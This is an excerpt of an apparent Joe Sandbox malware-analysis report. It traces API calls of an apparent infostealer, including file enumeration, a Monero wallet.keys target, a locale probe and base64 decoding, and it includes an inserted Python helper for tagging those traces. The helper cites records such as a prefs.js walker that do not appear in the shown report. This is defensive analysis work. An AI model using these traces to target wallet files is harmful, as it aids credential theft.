                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                • String ID: \*.*
                                • API String ID: 1415058207-1173974218
                                • Opcode ID: f746f92d5edc82eaeb8a5808f0a27af0cd781bd20682a7c0b85150caad0dde50
                                • Instruction ID: c9096b47d3783d2bc713f90d7ea694eec2d372e3cf2feff0611045fd92179127
                                • Opcode Fuzzy Hash: f746f92d5edc82eaeb8a5808f0a27af0cd781bd20682a7c0b85150caad0dde50
                                • Instruction Fuzzy Hash: 181231769101589ACB19EB60DC96EED73B8EF54300F4461BAB50A72191EF306F8BCF91
                                APIs
                                  • Part of subcall function 00EDA740: lstrcpy.KERNEL32(00EE0E17,00000000), ref: 00EDA788
                                  • Part of subcall function 00EDA9B0: lstrlen.KERNEL32(?,01B88950,?,\Monero\wallet.keys,00EE0E17), ref: 00EDA9C5
                                  • Part of subcall function 00EDA9B0: lstrcpy.KERNEL32(00000000), ref: 00EDAA04
                                  • Part of subcall function 00EDA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00EDAA12
                                  • Part of subcall function 00EDA8A0: lstrcpy.KERNEL32(?,00EE0E17), ref: 00EDA905
                                • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00EE0C2E), ref: 00ECDE5E
                                • StrCmpCA.SHLWAPI(?,00EE14C8), ref: 00ECDEAE
                                • StrCmpCA.SHLWAPI(?,00EE14CC), ref: 00ECDEC4
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00ECE3E0
                                • FindClose.KERNEL32(000000FF), ref: 00ECE3F2
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.2156997211.0000000000EC0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157012241.0000000000F71000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157012241.0000000000F7D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157012241.0000000000FA2000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157012241.000000000110A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157170594.000000000111E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157170594.00000000012AF000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157170594.0000000001396000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157170594.00000000013B8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157170594.00000000013C0000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157170594.00000000013CF000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157472097.00000000013D0000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157585260.0000000001573000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157600588.0000000001574000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                • String ID: \*.*
                                • API String ID: 2325840235-1173974218
                                • Opcode ID: bb1eb85263f68aab727d043d5634c86c380ce530658672af4387d8bc9c1f4db9
                                • Instruction ID: 3748cfaf016f3ca76f32540edd51a3262a1b10dd1350c7492f4a25cbde6fd077
                                • Opcode Fuzzy Hash: bb1eb85263f68aab727d043d5634c86c380ce530658672af4387d8bc9c1f4db9
                                • Instruction Fuzzy Hash: 52F11F768101589ACB19EB60DC95EEE7378FF54300F8461FAA41A72191EF306B8BDF51
                                APIs
                                  • Part of subcall function 00EDA740: lstrcpy.KERNEL32(00EE0E17,00000000), ref: 00EDA788
                                  • Part of subcall function 00EDA920: lstrcpy.KERNEL32(00000000,?), ref: 00EDA972
                                  • Part of subcall function 00EDA920: lstrcat.KERNEL32(00000000), ref: 00EDA982
                                  • Part of subcall function 00EDA9B0: lstrlen.KERNEL32(?,01B88950,?,\Monero\wallet.keys,00EE0E17), ref: 00EDA9C5
                                  • Part of subcall function 00EDA9B0: lstrcpy.KERNEL32(00000000), ref: 00EDAA04
                                  • Part of subcall function 00EDA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00EDAA12
                                  • Part of subcall function 00EDA8A0: lstrcpy.KERNEL32(?,00EE0E17), ref: 00EDA905
                                • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00EE14B0,00EE0C2A), ref: 00ECDAEB
                                • StrCmpCA.SHLWAPI(?,00EE14B4), ref: 00ECDB33
                                • StrCmpCA.SHLWAPI(?,00EE14B8), ref: 00ECDB49
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00ECDDCC
                                • FindClose.KERNEL32(000000FF), ref: 00ECDDDE
                                Memory Dump Source
                                • Source File: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.2156997211.0000000000EC0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157012241.0000000000F71000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157012241.0000000000F7D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157012241.0000000000FA2000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157012241.000000000110A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157170594.000000000111E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157170594.00000000012AF000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157170594.0000000001396000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157170594.00000000013B8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157170594.00000000013C0000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157170594.00000000013CF000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157472097.00000000013D0000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157585260.0000000001573000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157600588.0000000001574000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                • String ID:
                                • API String ID: 3334442632-0
                                • Opcode ID: a10383a7fb0481d49da0b7858fa06cb904598ce5447aab15491addc5823435ae
                                • Instruction ID: 99e495fc0f6de208d5765e73f6499cfcd9b07fe5bb3a0e766d9373c40cd950b4
                                • Opcode Fuzzy Hash: a10383a7fb0481d49da0b7858fa06cb904598ce5447aab15491addc5823435ae
                                • Instruction Fuzzy Hash: 0691457290020457CB14FF70ED56EED73BDEF84300F44967AB81AB6241EE759B4A8B92
                                APIs
                                  • Part of subcall function 00EDA740: lstrcpy.KERNEL32(00EE0E17,00000000), ref: 00EDA788
                                • GetKeyboardLayoutList.USER32(00000000,00000000,00EE05AF), ref: 00ED7BE1
                                • LocalAlloc.KERNEL32(00000040,?), ref: 00ED7BF9
                                • GetKeyboardLayoutList.USER32(?,00000000), ref: 00ED7C0D
                                • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00ED7C62
                                • LocalFree.KERNEL32(00000000), ref: 00ED7D22
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.2156997211.0000000000EC0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157012241.0000000000F71000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157012241.0000000000F7D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157012241.0000000000FA2000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157012241.000000000110A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157170594.000000000111E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157170594.00000000012AF000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157170594.0000000001396000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157170594.00000000013B8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157170594.00000000013C0000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157170594.00000000013CF000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157472097.00000000013D0000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157585260.0000000001573000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157600588.0000000001574000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                • String ID: /
                                • API String ID: 3090951853-4001269591
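                                The API traces in the records above (the FindFirstFileA / StrCmpCA / FindNextFileA / FindClose loops, one of which also calls CopyFileA and DeleteFileA, and the GetKeyboardLayoutList / GetLocaleInfoA record) are easier to triage once they are grouped per function and tagged. The Python below is an added example, not part of the Joe Sandbox report or its IDA plugin. It parses the report's "Opcode ID", "APIs" and "String ID" lines as printed above (the embedded sample is copied from three of those records) and applies heuristic tags. The tag names are my own, and the "inside the loop" check assumes that call sites whose ref addresses fall between the FindFirstFileA and FindNextFileA sites belong to the loop body; that holds for these records but is an assumption in general.

```python
"""Group a Joe Sandbox function trace into per-function records and tag behaviours.

Added triage helper, not part of the report or its IDA plugin. It reads the
'Opcode ID', 'APIs' and 'String ID' lines exactly as the report prints them.
"""
import re

# Constructed sample: three records copied from the report text above (the
# prefs.js walker, the CopyFileA/DeleteFileA walker, the keyboard-layout probe),
# trimmed to the lines this parser looks at.
SAMPLE = """\
• Opcode ID: a451585c04659712bfafb3cdd2b6be5d758b6457e212f1060dea55eaef275929
APIs
  • Part of subcall function 00EDA9B0: lstrlen.KERNEL32(?,01B88950,?,\\Monero\\wallet.keys,00EE0E17), ref: 00EDA9C5
• FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00EE15B8,00EE0D96), ref: 00ECF71E
• StrCmpCA.SHLWAPI(?,00EE15BC), ref: 00ECF76F
• StrCmpCA.SHLWAPI(?,00EE15C0), ref: 00ECF785
• FindNextFileA.KERNEL32(000000FF,?), ref: 00ECFAB1
• FindClose.KERNEL32(000000FF), ref: 00ECFAC3
• String ID: prefs.js
• Opcode ID: 9a94df1c399a9f9e0ade3eff626789909db84444ef12420f59764b3d270a56d8
APIs
• FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00EE510C,?,?,?,00EE51B4,?,?,00000000,?,00000000), ref: 00EC1923
• StrCmpCA.SHLWAPI(?,00EE525C), ref: 00EC1973
• StrCmpCA.SHLWAPI(?,00EE5304), ref: 00EC1989
• CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00EC1D40
• DeleteFileA.KERNEL32(00000000), ref: 00EC1DCA
• FindNextFileA.KERNEL32(000000FF,?), ref: 00EC1E20
• FindClose.KERNEL32(000000FF), ref: 00EC1E32
• String ID: \\*.*
• Opcode ID: a10383a7fb0481d49da0b7858fa06cb904598ce5447aab15491addc5823435ae
APIs
• GetKeyboardLayoutList.USER32(00000000,00000000,00EE05AF), ref: 00ED7BE1
• LocalAlloc.KERNEL32(00000040,?), ref: 00ED7BF9
• GetKeyboardLayoutList.USER32(?,00000000), ref: 00ED7C0D
• GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00ED7C62
• LocalFree.KERNEL32(00000000), ref: 00ED7D22
• String ID: /
"""

OPCODE_RE = re.compile(r"^\s*•\s*Opcode ID:\s*(?P<id>[0-9a-f]{64})\s*$")
STRING_RE = re.compile(r"^\s*•\s*String ID:\s*(?P<s>.*?)\s*$")
API_RE = re.compile(
    r"^\s*•\s*(?P<sub>Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<name>\w+)\.(?P<module>\w+)\((?P<args>.*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
WILDCARD = set("*%?")


def parse_records(text):
    """Split the report text at each 'Opcode ID' line and collect that record's API calls."""
    records, cur = [], None
    for line in text.splitlines():
        m = OPCODE_RE.match(line)
        if m:
            cur = {"opcode_id": m["id"], "apis": [], "string_id": ""}
            records.append(cur)
            continue
        if cur is None:
            continue
        m = API_RE.match(line)
        if m:
            cur["apis"].append({
                "name": m["name"],
                "module": m["module"],
                "args": [a.strip() for a in m["args"].split(",")],
                "ref": int(m["ref"], 16),          # call-site address in the dump
                "subcall": m["sub"] is not None,   # reported from a callee, not this function
            })
            continue
        m = STRING_RE.match(line)
        if m:
            cur["string_id"] = m["s"]
    return records


def _looks_like_target(tok):
    """A path or file-name literal, as opposed to an address, '?' or a format/wildcard pattern."""
    return bool(tok) and ("\\" in tok or "." in tok) and not (set(tok) & WILDCARD)


def _direct(rec, name):
    return [a for a in rec["apis"] if a["name"] == name and not a["subcall"]]


def classify(rec):
    """Heuristic behaviour tags (names are my own) plus any file/path literals seen."""
    tags = []
    first, nxt = _direct(rec, "FindFirstFileA"), _direct(rec, "FindNextFileA")
    if first and nxt and _direct(rec, "FindClose"):
        skip = len(_direct(rec, "StrCmpCA")) >= 2  # the usual "." / ".." comparison pair
        tags.append("directory enumeration" + (" (skips . and ..)" if skip else ""))
        # Assumption: call sites between the FindFirstFileA and FindNextFileA
        # addresses are the loop body. Holds for these records; heuristic in general.
        lo, hi = first[0]["ref"], nxt[0]["ref"]
        body = {a["name"] for a in rec["apis"] if not a["subcall"] and lo < a["ref"] < hi}
        if {"CopyFileA", "DeleteFileA"} <= body:
            tags.append("CopyFileA + DeleteFileA inside the enumeration loop (file staging)")
    if len(_direct(rec, "GetKeyboardLayoutList")) >= 2 and _direct(rec, "GetLocaleInfoA"):
        # First call with a NULL buffer returns the count, the second fills the
        # list, then GetLocaleInfoA queries a layout's locale: a locale check.
        tags.append("keyboard-layout / locale probe")
    targets = {rec["string_id"]} | {t for a in rec["apis"] for t in a["args"]}
    return {
        "opcode_id": rec["opcode_id"][:12],
        "tags": tags,
        "targets": sorted(t for t in targets if _looks_like_target(t)),
    }


def triage(text):
    return [classify(r) for r in parse_records(text)]


if __name__ == "__main__":
    for r in triage(SAMPLE):
        print(r["opcode_id"], "|", "; ".join(r["tags"]) or "-", "|", ", ".join(r["targets"]) or "-")
```

                                Run against the full report text instead of SAMPLE, the same three functions come out tagged as above; the wallet.keys literal is attributed to the prefs.js walker only because the report lists it under that function's subcalls, so treat the targets column as "strings reachable from this function", not as proof of what the loop body touches.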
                                • Opcode ID: a8a59c76877398e3012edcc6ab5d70b4b7f343548119f1d9b64d8ea7c18de577
                                • Instruction ID: 63fd19638359c5e1f49d4fd64cd00900e60f63ab7dad96b1d451e481e2724080
                                • Opcode Fuzzy Hash: a8a59c76877398e3012edcc6ab5d70b4b7f343548119f1d9b64d8ea7c18de577
                                • Instruction Fuzzy Hash: F0412E71950218ABDB24DF94DC99BEDB3B4FF48700F2041AAE50976281DB742F86CFA1
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2157170594.000000000111E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.2156997211.0000000000EC0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157012241.0000000000F71000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157012241.0000000000F7D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157012241.0000000000FA2000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157012241.000000000110A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157170594.00000000012AF000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157170594.0000000001396000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157170594.00000000013B8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157170594.00000000013C0000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157170594.00000000013CF000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157472097.00000000013D0000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157585260.0000000001573000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157600588.0000000001574000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: 2W+$@OV$OAk6$O_RN$^A$$gE}}$rU|M
                                • API String ID: 0-3737528765
                                • Opcode ID: bb22e03fbfada0c5294ffd742c8c2ba59fa3eb5fd38d9700fb48d08720432240
                                • Instruction ID: 962f8f40501cfc57c8fc9311b3492df43c8cf30ae5dfa8a29ee5ccffec643673
                                • Opcode Fuzzy Hash: bb22e03fbfada0c5294ffd742c8c2ba59fa3eb5fd38d9700fb48d08720432240
                                • Instruction Fuzzy Hash: 74B23CF360C2049FE304AE2DEC8567BBBE9EFD4620F1A853DE6C4C7744E67598018696
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2157170594.000000000111E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.2156997211.0000000000EC0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157012241.0000000000F71000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157012241.0000000000F7D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157012241.0000000000FA2000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157012241.000000000110A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157170594.00000000012AF000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157170594.0000000001396000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157170594.00000000013B8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157170594.00000000013C0000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157170594.00000000013CF000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157472097.00000000013D0000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157585260.0000000001573000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157600588.0000000001574000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: 3YvL$A5l~$M?w$W$w$[$w$uI6/$)tD
                                • API String ID: 0-1347006738
                                • Opcode ID: 814f90e434920abd5b88c43d69569c574941723899e6a35e5793785b93df1280
                                • Instruction ID: e91e39373be12e867032c5ac34b423cbf6c395476bca08ffda45a08bbf73acd5
                                • Opcode Fuzzy Hash: 814f90e434920abd5b88c43d69569c574941723899e6a35e5793785b93df1280
                                • Instruction Fuzzy Hash: 03B207F360C2009FE708AF2DDC8567ABBE5EF94720F1A893DE6C5C7744EA3558018696
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2157170594.000000000111E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.2156997211.0000000000EC0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157012241.0000000000F71000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157012241.0000000000F7D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157012241.0000000000FA2000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157012241.000000000110A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157170594.00000000012AF000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157170594.0000000001396000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157170594.00000000013B8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157170594.00000000013C0000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157170594.00000000013CF000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157472097.00000000013D0000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157585260.0000000001573000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157600588.0000000001574000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: c[{$2_k$?A3$B-d$hD~}$Ai3$ky
                                • API String ID: 0-2078783676
                                • Opcode ID: bab6467895bfa599cfacfe7686fad7889befe52a625c8af9f300dce36a174f87
                                • Instruction ID: 963af2d25f5e69b038ab260602792bb02235ab26a9c10b6bed6e4ca6dce74e0a
                                • Opcode Fuzzy Hash: bab6467895bfa599cfacfe7686fad7889befe52a625c8af9f300dce36a174f87
                                • Instruction Fuzzy Hash: 81B2E5F3A0C2049FE304AE2DEC8567ABBE5EF94720F16892DEAC4C7344E63558458797
                                APIs
                                  • Part of subcall function 00EDA740: lstrcpy.KERNEL32(00EE0E17,00000000), ref: 00EDA788
                                  • Part of subcall function 00EDA920: lstrcpy.KERNEL32(00000000,?), ref: 00EDA972
                                  • Part of subcall function 00EDA920: lstrcat.KERNEL32(00000000), ref: 00EDA982
                                  • Part of subcall function 00EDA9B0: lstrlen.KERNEL32(?,01B88950,?,\Monero\wallet.keys,00EE0E17), ref: 00EDA9C5
                                  • Part of subcall function 00EDA9B0: lstrcpy.KERNEL32(00000000), ref: 00EDAA04
                                  • Part of subcall function 00EDA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00EDAA12
                                  • Part of subcall function 00EDA8A0: lstrcpy.KERNEL32(?,00EE0E17), ref: 00EDA905
                                • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00EE0D73), ref: 00ECE4A2
                                • StrCmpCA.SHLWAPI(?,00EE14F8), ref: 00ECE4F2
                                • StrCmpCA.SHLWAPI(?,00EE14FC), ref: 00ECE508
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00ECEBDF
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.2156997211.0000000000EC0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157012241.0000000000F71000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157012241.0000000000F7D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157012241.0000000000FA2000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157012241.000000000110A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157170594.000000000111E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157170594.00000000012AF000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157170594.0000000001396000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157170594.00000000013B8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157170594.00000000013C0000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157170594.00000000013CF000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157472097.00000000013D0000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157585260.0000000001573000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157600588.0000000001574000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                                • String ID: \*.*
                                • API String ID: 433455689-1173974218
                                • Opcode ID: 45990e5f19ce55076f8068303ce489b2f0bc9335365594dbd00cc765b3b0c29d
                                • Instruction ID: dba77624b744bbdaaf1efabc4c6b18dc796cdb627c57e01fda9aa189b837d5b5
                                • Opcode Fuzzy Hash: 45990e5f19ce55076f8068303ce489b2f0bc9335365594dbd00cc765b3b0c29d
                                • Instruction Fuzzy Hash: 621255369001189ADB18FB60DD96EED73B9EF54300F4451BAB50A72281EF705F8ACF92
                                APIs
                                • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N,00000000,00000000), ref: 00EC9AEF
                                • LocalAlloc.KERNEL32(00000040,?,?,?,00EC4EEE,00000000,?), ref: 00EC9B01
                                • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N,00000000,00000000), ref: 00EC9B2A
                                • LocalFree.KERNEL32(?,?,?,?,00EC4EEE,00000000,?), ref: 00EC9B3F
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.2156997211.0000000000EC0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157012241.0000000000F71000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157012241.0000000000F7D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157012241.0000000000FA2000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157012241.000000000110A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157170594.000000000111E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157170594.00000000012AF000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157170594.0000000001396000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157170594.00000000013B8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157170594.00000000013C0000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157170594.00000000013CF000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157472097.00000000013D0000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157585260.0000000001573000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157600588.0000000001574000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: BinaryCryptLocalString$AllocFree
                                • String ID: N
                                • API String ID: 4291131564-1689755984
                                • Opcode ID: 4b547632dceef005607afca3b60e862e6ed490dbd0e8a9315f5e9708976c6198
                                • Instruction ID: 8a999b67e7651f12990c47b793cca18c929188265184b3f9580bb90a78a96a87
                                • Opcode Fuzzy Hash: 4b547632dceef005607afca3b60e862e6ed490dbd0e8a9315f5e9708976c6198
                                • Instruction Fuzzy Hash: 6611D2B4640308BFEB14CF64D895FAA77B5FB89705F208059FD15AB384C7B2AA41CB90
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2157170594.000000000111E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.2156997211.0000000000EC0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157012241.0000000000F71000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157012241.0000000000F7D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157012241.0000000000FA2000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157012241.000000000110A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157170594.00000000012AF000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157170594.0000000001396000.00000040.00000001.01000000.00000003.sdmp
